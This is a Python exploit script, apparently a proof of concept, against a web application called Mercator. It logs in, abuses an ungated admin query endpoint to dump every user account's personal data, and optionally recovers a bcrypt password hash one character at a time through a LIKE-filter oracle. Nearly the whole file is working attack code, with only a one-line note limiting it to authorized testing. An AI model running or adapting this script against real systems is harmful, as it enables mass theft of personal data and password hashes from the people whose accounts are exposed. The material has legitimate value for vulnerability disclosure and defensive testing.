#!/usr/bin/env python3
"""
Mercator Query Engine extraction tool.

Reads arbitrary models through the ungated POST /admin/queries/execute
endpoint (QueryController::execute). Default action: enumerate every user
account with its PII (id, login, name, email, granularity).

    ./bin/python3 query_engine_dump.py --base http://127.0.0.1:8000 \
        --user audit --password 'Audit123!'

Options:
    --json              emit JSON instead of a table
    --extract-hash ID   also recover the bcrypt password hash of account ID
                        (case-folded: the target column uses a CI collation)

Intended for authorized security testing of instances you are permitted to
assess.
"""

import argparse
import json
import re
import string
import sys
import warnings

# macOS system Python links LibreSSL; urllib3 v2 emits a one-time
# NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter
# it before `requests` pulls urllib3 in (disable_warnings() runs too late,
# the warning fires at import time).
warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL")

import requests
import urllib3

urllib3.disable_warnings()

LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"')
CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"')
BCRYPT_ALPHABET = "$./" + string.digits + string.ascii_uppercase + string.ascii_lowercase
PII_FIELDS = ["id", "login", "name", "email", "granularity"]


# ── Shared scaffold (identical across the Mercator exploit scripts) ──────────

def log(message):
    """Status banner — emitted on stderr so stdout stays pure result data."""
    print(message, file=sys.stderr)


def die(message):
    """Log *message* with a ``[!]`` prefix on stderr and exit with status 1."""
    log(f"[!] {message}")
    sys.exit(1)


def login(session, base, user, password):
    """Authenticate, print the login section, and return the CSRF token.

    Fetches ``{base}/login`` to read the form's ``_token``, posts the
    credentials, and then looks for a fresh token in the landing page (the
    ``csrf-token`` meta tag first, the ``_token`` form field as a fallback).

    The session cookies and the CSRF token are written to stderr via
    :func:`log`. Exits through :func:`die` when a token cannot be found or
    when the final URL after redirects still ends in ``/login``.
    """
    r = session.get(f"{base}/login", timeout=10)
    m = LOGIN_TOKEN_RE.search(r.text)
    if not m:
        die("CSRF token not found on /login")

    r = session.post(
        f"{base}/login",
        data={"_token": m.group(1), "login": user, "password": password},
        timeout=10,
        allow_redirects=True,
    )
    # Still sitting on /login after following redirects: treated as a
    # rejected login.
    if r.url.rstrip("/").endswith("/login"):
        die(f"authentication failed for '{user}'")

    m = CSRF_META_RE.search(r.text) or LOGIN_TOKEN_RE.search(r.text)
    if not m:
        die("CSRF token not found after login")
    csrf = m.group(1)

    log("[+] login")
    log(f" user : {user}")
    for c in session.cookies:
        log(f" cookie : {c.name}={c.value}")
    log(f" csrf token : {csrf}")
    return csrf


# ── Query engine ────────────────────────────────────────────────────────────

def query(session, base, csrf, dsl):
    """Submit a DSL to the query engine and return the decoded JSON.

    *dsl* is sent form-encoded as the POST body. Exits through :func:`die`
    on any non-200 status or when the body of a 200 response is not JSON.
    """
    r = session.post(
        f"{base}/admin/queries/execute",
        headers={"X-CSRF-TOKEN": csrf, "Accept": "application/json"},
        data=dsl,
        timeout=15,
    )
    if r.status_code != 200:
        die(f"/admin/queries/execute returned HTTP {r.status_code}")
    try:
        return r.json()
    except ValueError:
        # Every JSON decode error `requests` raises is a ValueError subclass.
        # Handling it here keeps a 200 response with an HTML body from being
        # reported as a connectivity failure (or as a raw traceback).
        die("/admin/queries/execute returned a non-JSON body")


def fetch_accounts(session, base, csrf):
    """Return every user account with its PII fields.

    Returns the ``rows`` list of the response, or an empty list when the
    response has no ``rows`` key.
    """
    data = query(session, base, csrf,
                 {"from": "users", "output": "list", "select[]": PII_FIELDS})
    return data.get("rows", [])


def extract_hash(session, base, csrf, account_id):
    """Recover an account's bcrypt hash via the filter-side LIKE oracle.

    Grows a known prefix one character at a time: a candidate is accepted
    when the query filtered on ``id = account_id`` and
    ``password LIKE '<prefix><candidate>%'`` reports at least one row.

    Returns the recovered string. It may be shorter than 60 characters (or
    empty) if no candidate matched at some position. Per the module
    docstring the column uses a case-insensitive collation, so letters are
    case-folded: uppercase precedes lowercase in ``BCRYPT_ALPHABET`` and the
    first match wins.
    """
    known = ""
    while len(known) < 60:  # a bcrypt hash string is 60 characters long
        match = None
        for c in BCRYPT_ALPHABET:
            dsl = {
                "from": "users",
                "output": "list",
                "select[]": ["id"],
                "filters[0][field]": "id",
                "filters[0][operator]": "=",
                "filters[0][value]": str(account_id),
                "filters[1][field]": "password",
                "filters[1][operator]": "like",
                "filters[1][value]": known + c + "%",
            }
            if query(session, base, csrf, dsl)["meta"]["count"] >= 1:
                match = c
                break
        if match is None:
            break
        known += match
    return known


def render_table(accounts):
    """Print *accounts* on stdout as a left-aligned table of ``PII_FIELDS``.

    Each column is as wide as its longest cell (header included); a field
    missing from a row is rendered as an empty string.
    """
    widths = {
        f: max([len(f)] + [len(str(a.get(f, ""))) for a in accounts])
        for f in PII_FIELDS
    }

    def row(values):
        """Format one line, padding each value to its column width."""
        return " ".join(
            str(v).ljust(widths[f]) for f, v in zip(PII_FIELDS, values)
        )

    print(row(PII_FIELDS))
    print(" ".join("-" * widths[f] for f in PII_FIELDS))
    for a in accounts:
        print(row([a.get(f, "") for f in PII_FIELDS]))


def main():
    """Parse the command line, log in, dump the accounts and print them.

    Status messages go to stderr; the table (or JSON with ``--json``) goes
    to stdout. With ``--extract-hash ID`` the recovered hash is logged and
    attached as ``password_hash`` to the matching account row.
    """
    ap = argparse.ArgumentParser(description="Mercator Query Engine extraction tool")
    ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL")
    ap.add_argument("--user", required=True, help="account login")
    ap.add_argument("--password", required=True)
    ap.add_argument("--json", action="store_true", help="emit JSON instead of a table")
    ap.add_argument("--extract-hash", type=int, metavar="ID",
                    help="recover the bcrypt hash of account ID")
    args = ap.parse_args()

    # Tolerate a trailing slash on --base; otherwise every request URL
    # would contain a double slash ("http://host//login").
    base = args.base.rstrip("/")

    session = requests.Session()
    session.verify = False

    csrf = login(session, base, args.user, args.password)
    accounts = fetch_accounts(session, base, csrf)
    log(f"[+] {len(accounts)} account(s) extracted from the users model")

    if args.extract_hash is not None:
        digest = extract_hash(session, base, csrf, args.extract_hash)
        log(f"[+] account {args.extract_hash} password hash: {digest}")
        # Compare as strings: the id may come back from the API as either
        # a JSON number or a JSON string.
        wanted = str(args.extract_hash)
        for a in accounts:
            if str(a.get("id")) == wanted:
                a["password_hash"] = digest

    if args.json:
        print(json.dumps(accounts, indent=2))
    else:
        render_table(accounts)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        die("interrupted")
    except requests.RequestException as e:
        die(f"could not reach Mercator: {e}")